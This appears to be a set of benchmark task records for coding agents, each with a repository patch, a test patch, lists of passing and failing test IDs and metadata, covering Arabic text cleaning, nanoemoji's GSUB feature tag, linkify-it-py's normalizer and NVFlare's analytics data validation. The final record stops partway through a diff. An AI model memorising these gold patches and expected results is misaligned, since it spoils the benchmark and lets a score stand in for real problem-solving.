"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0648\\u0636\\u0648\\u0621-\\u0648\\u0635\\u0648\\u0621]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u062d\\u0638\\u0631-\\u062d\\u0637\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0635\\u063a\\u0649-\\u0635\\u0639\\u0649]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0627\\u0641\\u0644\\u0627\\u0645-\\u0627\\u06a1\\u0644\\u0627\\u0645]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0648\\u0642\\u0649-\\u0648\\u066f\\u0649]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0633\\u0646\\u0629-\\u0633\\u066e\\u0647]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_mid[\\u0633\\u0644\\u064a\\u0645-\\u0633\\u0644\\u0649\\u0645]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0635\\u0628-\\u0635\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0633\\u062a-\\u0633\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u062d\\u062b-\\u062d\\u066e]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u062d\\u0631\\u062c-\\u062d\\u0631\\u062d]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0645\\u062e-\\u0645\\u062d]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0639\\u0648\\u0630-\\u0639\\u0648\\u062f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0648\\u0632-\\u0648\\u0631]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0631\\u0634-\\u0631\\u0633]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0648\\u0636\\u0648\\u0621-\\u0648\\u0635\\u0648\\u0621]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0648\\u0639\\u0638-\\u0648\\u0639\\u0637]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0635\\u0645\\u063a-\\u0635\\u0645\\u0639]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0648\\u0641\\u0649-\\u0648\\u06a1\\u0649]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u062d\\u0642-\\u062d\\u066f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0633\\u0646-\\u0633\\u06ba]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0645\\u064a-\\u0645\\u0649]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_dots_end[\\u0635\\u0644\\u0627\\u0629-\\u0635\\u0644\\u0627\\u0647]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646-\\u0627\\u0644\\u066e\\u066e\\u0649\\u0627\\u06ba]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646\\u064f",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646\\n\\u0642\\u0648\\u064a-\\u0627\\u0644\\u066e\\u066e\\u0649\\u0627\\u06ba\\n\\u066f\\u0648\\u0649]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646.-\\u0627\\u0644\\u066e\\u066e\\u0649\\u0627\\u06ba.0]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646.-\\u0627\\u0644\\u066e\\u066e\\u0649\\u0627\\u06ba.1]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u064a\\u0627\\u0646\\u061f-\\u0627\\u0644\\u066e\\u066e\\u0649\\u0627\\u06ba\\u061f]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u0652\\u064a\\u0627\\u0646\\U0001f60a-\\u0627\\u0644\\u066e\\u066e\\u0652\\u0649\\u0627\\u06ba\\U0001f60a]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_with_edge_case[\\u0627\\u0644\\u0628\\u0646\\u0652\\u064a\\u0627\\u0646\\u064f\\u060c-\\u0627\\u0644\\u066e\\u066e\\u0652\\u0649\\u0627\\u06ba\\u064f\\u060c]",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_general[\\u200f\\u0627\\u062d\\u0630\\u0631\\u0648\\u0627",
"tests/cleaners/test_remove.py::test_remove_arabic_letter_dots_general[\\u0627\\u0644\\u0645\\u062a\\u0633\\u0644\\u0633\\u0644\\u0627\\u062a"
] |
{
"failed_lite_validators": [
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-08-04 08:47:59+00:00
|
bsd-3-clause
| 737
|
|
googlefonts__nanoemoji-280
|
diff --git a/src/nanoemoji/features.py b/src/nanoemoji/features.py
index 741ed2c..454df73 100644
--- a/src/nanoemoji/features.py
+++ b/src/nanoemoji/features.py
@@ -20,14 +20,17 @@
from nanoemoji.glyph import glyph_name
-def generate_fea(rgi_sequences):
- # Generate rlig feature with ligature lookup for multi-codepoint RGIs
+DEFAULT_GSUB_FEATURE_TAG = "ccmp"
+
+
+def generate_fea(rgi_sequences, feature_tag=DEFAULT_GSUB_FEATURE_TAG):
+ # Generate feature with ligature lookup for multi-codepoint RGIs
rules = []
rules.append("languagesystem DFLT dflt;")
rules.append("languagesystem latn dflt;")
rules.append("")
- rules.append("feature rlig {")
+ rules.append(f"feature {feature_tag} {{")
for rgi in sorted(rgi_sequences):
if len(rgi) == 1:
continue
@@ -35,6 +38,6 @@ def generate_fea(rgi_sequences):
target = glyph_name(rgi)
rules.append(" sub %s by %s;" % (" ".join(glyphs), target))
- rules.append("} rlig;")
+ rules.append(f"}} {feature_tag};")
rules.append("")
return "\n".join(rules)
|
googlefonts/nanoemoji
|
67081b8abe14771b757a95791cf6b1d03e9ecf52
|
diff --git a/tests/features_test.py b/tests/features_test.py
new file mode 100644
index 0000000..fba756e
--- /dev/null
+++ b/tests/features_test.py
@@ -0,0 +1,19 @@
+from textwrap import dedent
+from nanoemoji.features import generate_fea, DEFAULT_GSUB_FEATURE_TAG
+import pytest
+
+
+@pytest.mark.parametrize("feature_tag", (DEFAULT_GSUB_FEATURE_TAG, "rlig"))
+def test_generate_fea(feature_tag):
+ rgi_sequences = [(0x1F64C,), (0x1F64C, 0x1F3FB), (0x1F64C, 0x1F3FC)]
+ assert generate_fea(rgi_sequences, feature_tag=feature_tag) == dedent(
+ f"""\
+ languagesystem DFLT dflt;
+ languagesystem latn dflt;
+
+ feature {feature_tag} {{
+ sub g_1f64c g_1f3fb by g_1f64c_1f3fb;
+ sub g_1f64c g_1f3fc by g_1f64c_1f3fc;
+ }} {feature_tag};
+ """
+ )
|
Ligature changed from rlig feature to ccmp
Support for ligature features differs across platforms and browsers ([Test](http://unifraktur.sourceforge.net/testcases/enable_opentype_features/)). Let us discuss which issues we should pay attention to for emoji ligatures.
noto-emoji and noto-emoji-svg both use ccmp by default
https://github.com/googlefonts/noto-emoji/blob/41ae6686ace1453b432ac907a165428f2e1ad54e/NotoColorEmoji.tmpl.ttx.tmpl#L311
https://github.com/adobe-fonts/noto-emoji-svg/blob/ed5c78c8e3d46fdf8dbf7532875aaabfdcdc5c3a/GSUB.fea#L4
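A quick usage sketch against the patched `generate_fea` signature above (the expected output shape is the one asserted in the new test): the default tag becomes `ccmp`, while `rlig` stays available as an explicit opt-in.

```python
from nanoemoji.features import generate_fea

# Skin-tone variants of U+1F64C ("raising hands") as RGI codepoint sequences.
rgi_sequences = [(0x1F64C,), (0x1F64C, 0x1F3FB), (0x1F64C, 0x1F3FC)]

print(generate_fea(rgi_sequences))                      # lookup wrapped in `feature ccmp { ... } ccmp;`
print(generate_fea(rgi_sequences, feature_tag="rlig"))  # previous behaviour, for consumers that still want rlig
```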
|
0.0
|
67081b8abe14771b757a95791cf6b1d03e9ecf52
|
[
"tests/features_test.py::test_generate_fea[ccmp]",
"tests/features_test.py::test_generate_fea[rlig]"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-04-19 14:52:41+00:00
|
apache-2.0
| 2,639
|
|
tsutsu3__linkify-it-py-24
|
diff --git a/README.md b/README.md
index 0763763..bd45d54 100644
--- a/README.md
+++ b/README.md
@@ -2,6 +2,7 @@
[](https://github.com/tsutsu3/linkify-it-py/actions)
[](https://pypi.org/project/linkify-it-py/)
+[](https://anaconda.org/conda-forge/linkify-it-py)
[](https://codecov.io/gh/tsutsu3/linkify-it-py)
[](https://codeclimate.com/github/tsutsu3/linkify-it-py/maintainability)
@@ -25,6 +26,12 @@ Why it's awesome:
pip install linkify-it-py
```
+or
+
+```bash
+conda install -c conda-forge linkify-it-py
+```
+
## Usage examples
### Example 1. Simple use
@@ -82,28 +89,28 @@ print(linkify.match("Site tamanegi.onion!"))
### Example 3. Add twitter mentions handler
```python
-from linkify import LinkfiyIt
+from linkify_it import LinkifyIt
-linkifyit = LinkifyIt()
+linkify = LinkifyIt()
-def validate(self, text, pos):
+def validate(obj, text, pos):
tail = text[pos:]
- if not self.re.get("twitter"):
- self.re["twitter"] = re.compile(
- "^([a-zA-Z0-9_]){1,15}(?!_)(?=$|" + self.re["src_ZPCc"] + ")"
+ if not obj.re.get("twitter"):
+ obj.re["twitter"] = re.compile(
+ "^([a-zA-Z0-9_]){1,15}(?!_)(?=$|" + obj.re["src_ZPCc"] + ")"
)
- if self.re["twitter"].search(tail):
+ if obj.re["twitter"].search(tail):
if pos > 2 and tail[pos - 2] == "@":
return False
- return len(self.re["twitter"].search(tail).group())
+ return len(obj.re["twitter"].search(tail).group())
return 0
-def normalize(self, m):
- m.url = "https://twitter.com/" + re.sub(r"^@", "", m.url)
+def normalize(obj, match):
+ match.url = "https://twitter.com/" + re.sub(r"^@", "", match.url)
-linkifyit.add("@", {"validate": validate, "normalize": normalize})
+linkify.add("@", {"validate": validate, "normalize": normalize})
```
diff --git a/linkify_it/main.py b/linkify_it/main.py
index 7e6af33..b06a7b3 100644
--- a/linkify_it/main.py
+++ b/linkify_it/main.py
@@ -189,7 +189,7 @@ class LinkifyIt:
def _create_normalizer(self):
def func(match):
- self._normalize(match)
+ self.normalize(match)
return func
@@ -590,11 +590,11 @@ class LinkifyIt:
self._compile()
return self
- def _normalize(self, match):
+ def normalize(self, match):
"""Default normalizer (if schema does not define it's own).
Args:
- match ():
+ match (:class:`linkify_it.main.Match`): Match result
"""
if not match.schema:
match.url = "http://" + match.url
|
tsutsu3/linkify-it-py
|
1e35d3c46172864eb3e2c275d6e797a1b2acb43e
|
diff --git a/test/test_linkify.py b/test/test_linkify.py
index afa4f00..79bf297 100644
--- a/test/test_linkify.py
+++ b/test/test_linkify.py
@@ -20,7 +20,7 @@ def dummy(_):
def test_links(number, line, expected):
linkifyit = LinkifyIt(options={"fuzzy_ip": True})
- linkifyit._normalize = dummy
+ linkifyit.normalize = dummy
assert linkifyit.pretest(line) is True
assert linkifyit.test("\n" + line + "\n") is True
@@ -35,6 +35,6 @@ def test_links(number, line, expected):
def test_not_links(number, line, expected):
linkifyit = LinkifyIt()
- linkifyit._normalize = dummy
+ linkifyit.normalize = dummy
assert linkifyit.test(line) is False
|
Release on conda-forge
If you release on conda-forge, then I'll include it in the markdown-it-py conda requirements 😄
(If you don't know how: you need to make a PR to https://github.com/conda-forge/staged-recipes)
|
0.0
|
1e35d3c46172864eb3e2c275d6e797a1b2acb43e
|
[
"test/test_linkify.py::test_links[49->>example.com",
"test/test_linkify.py::test_links[88-4.4.4.4-4.4.4.4]",
"test/test_linkify.py::test_links[90-192.168.1.1/abc-192.168.1.1/abc]",
"test/test_linkify.py::test_links[102-google.com-google.com]",
"test/test_linkify.py::test_links[104-google.com:",
"test/test_linkify.py::test_links[107-s.l.o.w.io-s.l.o.w.io]",
"test/test_linkify.py::test_links[109-a-b.com-a-b.com]",
"test/test_linkify.py::test_links[111-GOOGLE.COM.-GOOGLE.COM]",
"test/test_linkify.py::test_links[114-google.xxx",
"test/test_linkify.py::test_links[153-[example.com/foo_bar.jpg)]-example.com/foo_bar.jpg]",
"test/test_linkify.py::test_links[218-<domain.com>-domain.com]",
"test/test_linkify.py::test_links[221-<domain.com>.-domain.com]",
"test/test_linkify.py::test_links[224-<domain.com/foo>-domain.com/foo]",
"test/test_linkify.py::test_links[227-<user@domain.com>-user@domain.com]",
"test/test_linkify.py::test_links[230-<user@domain.com>.-user@domain.com]",
"test/test_linkify.py::test_links[241-test.\"foo\".bar@gmail.co.uk!-test.\"foo\".bar@gmail.co.uk]",
"test/test_linkify.py::test_links[244-\"test@example.com\"-test@example.com]",
"test/test_linkify.py::test_links[247-name@example.com-name@example.com]",
"test/test_linkify.py::test_links[249->>name@example.com",
"test/test_linkify.py::test_links[258-foo+bar@gmail.com-foo+bar@gmail.com]",
"test/test_linkify.py::test_links[260-192.168.1.1@gmail.com-192.168.1.1@gmail.com]",
"test/test_linkify.py::test_links[265-(foobar",
"test/test_linkify.py::test_links[268-(email@example.com",
"test/test_linkify.py::test_links[271-(email@example.com)-email@example.com]",
"test/test_linkify.py::test_links[282-a.ws-a.ws]",
"test/test_linkify.py::test_links[284-\\u27a1.ws/\\u4a39-\\u27a1.ws/\\u4a39]",
"test/test_linkify.py::test_links[286-example.com/\\u4a39-example.com/\\u4a39]",
"test/test_linkify.py::test_links[288-\\u043f\\u0440\\u0435\\u0437\\u0438\\u0434\\u0435\\u043d\\u0442.\\u0440\\u0444-\\u043f\\u0440\\u0435\\u0437\\u0438\\u0434\\u0435\\u043d\\u0442.\\u0440\\u0444]",
"test/test_linkify.py::test_links[309-\\uff5cwww.google.com/www.google.com/foo\\uff5cbar",
"test/test_linkify.py::test_links[312-\\uff5ctest@google.com\\uff5cbar-test@google.com]",
"test/test_linkify.py::test_links[324-www.a--b.com-www.a--b.com]",
"test/test_linkify.py::test_links[326-www.c--u.com-www.c--u.com]"
] |
[
"test/test_linkify.py::test_links[4-My",
"test/test_linkify.py::test_links[7-My",
"test/test_linkify.py::test_links[10-http://example.com/foo_bar/-http://example.com/foo_bar/]",
"test/test_linkify.py::test_links[12-http://user:pass@example.com:8080-http://user:pass@example.com:8080]",
"test/test_linkify.py::test_links[14-http://user@example.com-http://user@example.com]",
"test/test_linkify.py::test_links[16-http://user@example.com:8080-http://user@example.com:8080]",
"test/test_linkify.py::test_links[18-http://user:pass@example.com-http://user:pass@example.com]",
"test/test_linkify.py::test_links[20-[https](https://www.ibm.com)[mailto](mailto:someone@ibm.com)",
"test/test_linkify.py::test_links[23-http://example.com:8080-http://example.com:8080]",
"test/test_linkify.py::test_links[25-http://example.com/?foo=bar-http://example.com/?foo=bar]",
"test/test_linkify.py::test_links[27-http://example.com?foo=bar-http://example.com?foo=bar]",
"test/test_linkify.py::test_links[29-http://example.com/#foo=bar-http://example.com/#foo=bar]",
"test/test_linkify.py::test_links[31-http://example.com#foo=bar-http://example.com#foo=bar]",
"test/test_linkify.py::test_links[33-http://a.in-http://a.in]",
"test/test_linkify.py::test_links[35-HTTP://GOOGLE.COM-HTTP://GOOGLE.COM]",
"test/test_linkify.py::test_links[37-http://example.invalid",
"test/test_linkify.py::test_links[40-http://inrgess2",
"test/test_linkify.py::test_links[43-http://999",
"test/test_linkify.py::test_links[46-http://host-name",
"test/test_linkify.py::test_links[52->>http://example.com",
"test/test_linkify.py::test_links[55-http://lyricstranslate.com/en/someone-you-\\u0d28\\u0d3f\\u0d28\\u0d4d\\u0d28\\u0d46-\\u0d2a\\u0d4b\\u0d32\\u0d4a\\u0d30\\u0d3e\\u0d33\\u0d4d\\u200d.html",
"test/test_linkify.py::test_links[61-//localhost-//localhost]",
"test/test_linkify.py::test_links[63-//test.123-//test.123]",
"test/test_linkify.py::test_links[65-http://localhost:8000?-http://localhost:8000]",
"test/test_linkify.py::test_links[72-My",
"test/test_linkify.py::test_links[75-My",
"test/test_linkify.py::test_links[82-My",
"test/test_linkify.py::test_links[96-test.example@http://vk.com-http://vk.com]",
"test/test_linkify.py::test_links[99-text:http://example.com/-http://example.com/]",
"test/test_linkify.py::test_links[121-(Scoped",
"test/test_linkify.py::test_links[124-http://example.com/foo_bar_(wiki)-http://example.com/foo_bar_(wiki)]",
"test/test_linkify.py::test_links[126-http://foo.com/blah_blah_[other]-http://foo.com/blah_blah_[other]]",
"test/test_linkify.py::test_links[128-http://foo.com/blah_blah_{I'm_king}-http://foo.com/blah_blah_{I'm_king}]",
"test/test_linkify.py::test_links[130-http://foo.com/blah_blah_I'm_king-http://foo.com/blah_blah_I'm_king]",
"test/test_linkify.py::test_links[132-http://www.kmart.com/bestway-10'-x-30inch-steel-pro-frame-pool/p-004W007538417001P-http://www.kmart.com/bestway-10'-x-30inch-steel-pro-frame-pool/p-004W007538417001P]",
"test/test_linkify.py::test_links[134-http://foo.com/blah_blah_\"doublequoted\"-http://foo.com/blah_blah_\"doublequoted\"]",
"test/test_linkify.py::test_links[136-http://foo.com/blah_blah_'singlequoted'-http://foo.com/blah_blah_'singlequoted']",
"test/test_linkify.py::test_links[138-(Scoped",
"test/test_linkify.py::test_links[141-[Scoped",
"test/test_linkify.py::test_links[144-{Scoped",
"test/test_linkify.py::test_links[147-\"Quoted",
"test/test_linkify.py::test_links[150-'Quoted",
"test/test_linkify.py::test_links[156-http://example.com/foo_bar.jpg.-http://example.com/foo_bar.jpg]",
"test/test_linkify.py::test_links[159-http://example.com/foo_bar/.-http://example.com/foo_bar/]",
"test/test_linkify.py::test_links[162-http://example.com/foo_bar,-http://example.com/foo_bar]",
"test/test_linkify.py::test_links[165-https://github.com/markdown-it/linkify-it/compare/360b13a733f521a8d4903d3a5e1e46c357e9d3ce...f580766349525150a80a32987bb47c2d592efc33-https://github.com/markdown-it/linkify-it/compare/360b13a733f521a8d4903d3a5e1e46c357e9d3ce...f580766349525150a80a32987bb47c2d592efc33]",
"test/test_linkify.py::test_links[167-https://www.google.com/search?sxsrf=ACYBGNTJFmX-GjNJ8fM-2LCkqyNyxGU1Ng%3A1575534146332&ei=Qr7oXf7rE4rRrgSEgrmoAw&q=clover&oq=clover&gs_l=psy-ab.3..0i67j0l9.2986.3947..4187...0.2..0.281.1366.1j0j5......0....1..gws-wiz.......0i71j35i39j0i131.qWp1nz4IJVA&ved=0ahUKEwj-lP6Iip7mAhWKqIsKHQRBDjUQ4dUDCAs&uact=5-https://www.google.com/search?sxsrf=ACYBGNTJFmX-GjNJ8fM-2LCkqyNyxGU1Ng%3A1575534146332&ei=Qr7oXf7rE4rRrgSEgrmoAw&q=clover&oq=clover&gs_l=psy-ab.3..0i67j0l9.2986.3947..4187...0.2..0.281.1366.1j0j5......0....1..gws-wiz.......0i71j35i39j0i131.qWp1nz4IJVA&ved=0ahUKEwj-lP6Iip7mAhWKqIsKHQRBDjUQ4dUDCAs&uact=5]",
"test/test_linkify.py::test_links[169-https://ourworldindata.org/grapher/covid-deaths-days-since-per-million?zoomToSelection=true&time=9..&country=FRA+DEU+ITA+ESP+GBR+USA+CAN-https://ourworldindata.org/grapher/covid-deaths-days-since-per-million?zoomToSelection=true&time=9..&country=FRA+DEU+ITA+ESP+GBR+USA+CAN]",
"test/test_linkify.py::test_links[171-http://example.com/foo_bar...-http://example.com/foo_bar]",
"test/test_linkify.py::test_links[174-http://172.26.142.48/viewerjs/#../0529/slides.pdf-http://172.26.142.48/viewerjs/#../0529/slides.pdf]",
"test/test_linkify.py::test_links[176-http://example.com/foo_bar..-http://example.com/foo_bar]",
"test/test_linkify.py::test_links[179-http://example.com/foo_bar?p=10.-http://example.com/foo_bar?p=10]",
"test/test_linkify.py::test_links[182-https://www.google.ru/maps/@59.9393895,30.3165389,15z?hl=ru-https://www.google.ru/maps/@59.9393895,30.3165389,15z?hl=ru]",
"test/test_linkify.py::test_links[184-https://www.google.com/maps/place/New+York,+NY,+USA/@40.702271,-73.9968471,11z/data=!4m2!3m1!1s0x89c24fa5d33f083b:0xc80b8f06e177fe62?hl=en-https://www.google.com/maps/place/New+York,+NY,+USA/@40.702271,-73.9968471,11z/data=!4m2!3m1!1s0x89c24fa5d33f083b:0xc80b8f06e177fe62?hl=en]",
"test/test_linkify.py::test_links[186-https://www.google.com/analytics/web/?hl=ru&pli=1#report/visitors-overview/a26895874w20458057p96934174/-https://www.google.com/analytics/web/?hl=ru&pli=1#report/visitors-overview/a26895874w20458057p96934174/]",
"test/test_linkify.py::test_links[188-http://business.timesonline.co.uk/article/0,,9065-2473189,00.html-http://business.timesonline.co.uk/article/0,,9065-2473189,00.html]",
"test/test_linkify.py::test_links[190-https://google.com/mail/u/0/#label/!!!Today/15c9b8193da01e65-https://google.com/mail/u/0/#label/!!!Today/15c9b8193da01e65]",
"test/test_linkify.py::test_links[192-http://example.com/123!-http://example.com/123]",
"test/test_linkify.py::test_links[195-http://example.com/123!!!-http://example.com/123]",
"test/test_linkify.py::test_links[198-http://example.com/foo--bar-http://example.com/foo--bar]",
"test/test_linkify.py::test_links[201-http://www.bloomberg.com/news/articles/2015-06-26/from-deutsche-bank-to-siemens-what-s-troubling-germany-inc--http://www.bloomberg.com/news/articles/2015-06-26/from-deutsche-bank-to-siemens-what-s-troubling-germany-inc-]",
"test/test_linkify.py::test_links[203-http://example.com/foo-with-trailing-dash-dot-.-http://example.com/foo-with-trailing-dash-dot-]",
"test/test_linkify.py::test_links[206-<http://domain.com>-http://domain.com]",
"test/test_linkify.py::test_links[209-<http://domain.com>.-http://domain.com]",
"test/test_linkify.py::test_links[212-<http://domain.com/foo>-http://domain.com/foo]",
"test/test_linkify.py::test_links[215-<http://domain.com/foo>.-http://domain.com/foo]",
"test/test_linkify.py::test_links[233-<mailto:user@domain.com>-mailto:user@domain.com]",
"test/test_linkify.py::test_links[252-mailto:name@example.com-mailto:name@example.com]",
"test/test_linkify.py::test_links[254-MAILTO:NAME@EXAMPLE.COM-MAILTO:NAME@EXAMPLE.COM]",
"test/test_linkify.py::test_links[256-mailto:foo_bar@example.com-mailto:foo_bar@example.com]",
"test/test_linkify.py::test_links[262-mailto:foo@bar",
"test/test_linkify.py::test_links[278-http://\\u272adf.ws/123-http://\\u272adf.ws/123]",
"test/test_linkify.py::test_links[280-http://xn--df-oiy.ws/123-http://xn--df-oiy.ws/123]",
"test/test_linkify.py::test_links[294-http://www.b\\xfcrgerentscheid-krankenh\\xe4user.de-http://www.b\\xfcrgerentscheid-krankenh\\xe4user.de]",
"test/test_linkify.py::test_links[296-http://www.xn--brgerentscheid-krankenhuser-xkc78d.de-http://www.xn--brgerentscheid-krankenhuser-xkc78d.de]",
"test/test_linkify.py::test_links[298-http://b\\xfcndnis-f\\xfcr-krankenh\\xe4user.de/wp-content/uploads/2011/11/cropped-logohp.jpg-http://b\\xfcndnis-f\\xfcr-krankenh\\xe4user.de/wp-content/uploads/2011/11/cropped-logohp.jpg]",
"test/test_linkify.py::test_links[300-http://xn--bndnis-fr-krankenhuser-i5b27cha.de/wp-content/uploads/2011/11/cropped-logohp.jpg-http://xn--bndnis-fr-krankenhuser-i5b27cha.de/wp-content/uploads/2011/11/cropped-logohp.jpg]",
"test/test_linkify.py::test_links[302-http://\\ufee1\\ufeee\\ufed8\\ufecb.\\ufeed\\ufeaf\\ufe8d\\ufead\\ufe93-\\ufe8d\\ufefc\\ufe98\\ufebb\\ufe8d\\ufefc\\ufe97.\\ufee2\\ufebb\\ufead/-http://\\ufee1\\ufeee\\ufed8\\ufecb.\\ufeed\\ufeaf\\ufe8d\\ufead\\ufe93-\\ufe8d\\ufefc\\ufe98\\ufebb\\ufe8d\\ufefc\\ufe97.\\ufee2\\ufebb\\ufead/]",
"test/test_linkify.py::test_links[304-http://xn--4gbrim.xn----ymcbaaajlc6dj7bxne2c.xn--wgbh1c/-http://xn--4gbrim.xn----ymcbaaajlc6dj7bxne2c.xn--wgbh1c/]",
"test/test_linkify.py::test_links[315-\\uff5chttp://google.com\\uff5cbar-http://google.com]",
"test/test_linkify.py::test_links[322-https://5b0ee223b312746c1659db3f--thelounge-chat.netlify.com/docs/-https://5b0ee223b312746c1659db3f--thelounge-chat.netlify.com/docs/]",
"test/test_linkify.py::test_links[328-http://a---b.com/-http://a---b.com/]",
"test/test_linkify.py::test_not_links[4-example.invalid-example.invalid/]",
"test/test_linkify.py::test_not_links[6-http://.example.com-http://-example.com]",
"test/test_linkify.py::test_not_links[8-hppt://example.com-example.coma]",
"test/test_linkify.py::test_not_links[10--example.coma-foo.123]",
"test/test_linkify.py::test_not_links[12-localhost",
"test/test_linkify.py::test_not_links[14-///localhost",
"test/test_linkify.py::test_not_links[16-//test",
"test/test_linkify.py::test_not_links[18-_http://example.com-_//example.com]",
"test/test_linkify.py::test_not_links[20-_example.com-http://example.com_]",
"test/test_linkify.py::test_not_links[22-@example.com-@example.com]",
"test/test_linkify.py::test_not_links[24-node.js",
"test/test_linkify.py::test_not_links[26-http://-http://.]",
"test/test_linkify.py::test_not_links[28-http://..-http://#]",
"test/test_linkify.py::test_not_links[30-http://##-http://?]",
"test/test_linkify.py::test_not_links[32-http://??-google.com:500000",
"test/test_linkify.py::test_not_links[34-show",
"test/test_linkify.py::test_not_links[36-/path/to/file.pl-/path/to/file.pl]",
"test/test_linkify.py::test_not_links[41-1.2.3.4.5-1.2.3]",
"test/test_linkify.py::test_not_links[43-1.2.3.400-1000.2.3.4]",
"test/test_linkify.py::test_not_links[45-a1.2.3.4-1.2.3.4a]",
"test/test_linkify.py::test_not_links[51-foo@bar"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_hyperlinks",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-12-19 07:54:04+00:00
|
mit
| 6,103
|
|
NVIDIA__NVFlare-56
|
diff --git a/nvflare/apis/analytix.py b/nvflare/apis/analytix.py
index b99c10f3..26a6423b 100644
--- a/nvflare/apis/analytix.py
+++ b/nvflare/apis/analytix.py
@@ -17,8 +17,8 @@ from typing import Optional
from nvflare.apis.dxo import DXO, DataKind
-DATA_TYPE_KEY = "analytics_data_type"
-KWARGS_KEY = "analytics_kwargs"
+_DATA_TYPE_KEY = "analytics_data_type"
+_KWARGS_KEY = "analytics_kwargs"
class AnalyticsDataType(Enum):
@@ -29,7 +29,7 @@ class AnalyticsDataType(Enum):
class AnalyticsData:
- def __init__(self, tag: str, value, data_type: AnalyticsDataType, kwargs: Optional[dict]):
+ def __init__(self, tag: str, value, data_type: AnalyticsDataType, kwargs: Optional[dict] = None):
"""This class defines AnalyticsData format.
It is a wrapper to provide from / to DXO conversion.
@@ -39,6 +39,18 @@ class AnalyticsData:
data_type (AnalyticDataType): type of the analytic data.
kwargs (optional, dict): additional arguments to be passed.
"""
+ if not isinstance(tag, str):
+ raise TypeError(f"expect tag to be an instance of str, but got {type(tag)}.")
+ if not isinstance(data_type, AnalyticsDataType):
+ raise TypeError(f"expect data_type to be an instance of AnalyticsDataType, but got {type(data_type)}.")
+ if kwargs and not isinstance(kwargs, dict):
+ raise TypeError(f"expect kwargs to be an instance of dict, but got {type(kwargs)}.")
+ if data_type == AnalyticsDataType.SCALAR and not isinstance(value, float):
+ raise TypeError(f"expect value to be an instance of float, but got {type(value)}")
+ elif data_type == AnalyticsDataType.SCALARS and not isinstance(value, dict):
+ raise TypeError(f"expect value to be an instance of dict, but got {type(value)}")
+ elif data_type == AnalyticsDataType.TEXT and not isinstance(value, str):
+ raise TypeError(f"expect value to be an instance of str, but got {type(value)}")
self.tag = tag
self.value = value
self.data_type = data_type
@@ -47,8 +59,8 @@ class AnalyticsData:
def to_dxo(self):
"""Converts the AnalyticsData to DXO object."""
dxo = DXO(data_kind=DataKind.ANALYTIC, data={self.tag: self.value})
- dxo.set_meta_prop(DATA_TYPE_KEY, self.data_type)
- dxo.set_meta_prop(KWARGS_KEY, self.kwargs)
+ dxo.set_meta_prop(_DATA_TYPE_KEY, self.data_type)
+ dxo.set_meta_prop(_KWARGS_KEY, self.kwargs)
return dxo
@classmethod
@@ -59,16 +71,14 @@ class AnalyticsData:
dxo (DXO): The DXO object to convert.
"""
if not isinstance(dxo, DXO):
- raise TypeError(f"dxo is not of type DXO, instead it has type {type(dxo)}.")
+ raise TypeError(f"expect dxo to be an instance of DXO, but got {type(dxo)}.")
if len(dxo.data) != 1:
raise ValueError("dxo does not have the correct format for AnalyticsData.")
tag, value = list(dxo.data.items())[0]
- data_type = dxo.get_meta_prop(DATA_TYPE_KEY)
- kwargs = dxo.get_meta_prop(KWARGS_KEY)
- if not isinstance(data_type, AnalyticsDataType):
- raise ValueError(f"data_type {data_type} is not supported.")
